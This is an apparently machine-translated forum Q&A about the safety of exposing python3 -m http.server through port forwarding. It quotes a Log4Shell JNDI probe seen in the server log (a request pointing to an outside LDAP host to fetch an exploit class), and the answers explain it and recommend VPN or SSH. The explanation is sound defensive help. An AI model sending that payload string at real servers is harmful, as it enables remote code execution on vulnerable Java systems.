我 python3 -m http.server 8080与端口转发一起运行,以便从任何地方访问我的笔记本电脑上的文件。
但出现了随机连接和一条特别奇怪的线:
GET /${jndi:ldap://185.246.87.50:1389/Exploit}
Run Code Online (Sandbox Code Playgroud)
您可以在此看到更多内容:
我正在做的事情安全吗?如果没有的话,有什么办法可以保证安全吗?也许是登录密码之类的东西?
我正在运行 python3 -m http.server 8080 以及端口转发,以便从任何地方访问我的笔记本电脑上的文件。
这可能意味着其他人也可以访问这些文件......所以我希望其中没有您不希望其他人阅读的内容。
但出现了随机连接和一个特别奇怪的行:GET /${jndi:ldap://185.246.87.50:1389/Exploit}。
奇怪的一行意味着人们正在扫描 log4j 漏洞(谷歌),但由于您有一个 Python 服务器而不是 Java,所以这个问题不应该让您担心。(但是其他随机连接应该如此)。
如果没有的话,有什么办法可以保证安全吗?也许是登录密码之类的东西?
如果您不知道如何确保安全(并且如果您不知道自己在做什么,那么遵循您在互联网上找到的随机食谱永远不会使其安全),并且如果您需要它是安全的,我建议采取服务器现在离线。相反,开始使用其他东西(例如VPN,或ssh)。
小智 5
取决于您托管的文件以及您当前使用的身份验证、授权或一般防御机制(据我所知可能没有)。如果文件很敏感,仅使用简单的 HTTP 服务器来提供它们,而不进行任何身份验证/保护可能不是最好的主意。
关于该jndi日志,您会看到:
GET /${jndi:ldap://185.246.87.50:1389/Exploit}据我所知,您看到的请求是下载恶意 Java 类的利用请求。我的拙见建议:
我会做什么?
| 归档时间: |
|
| 查看次数: |
6561 次 |
| 最近记录: |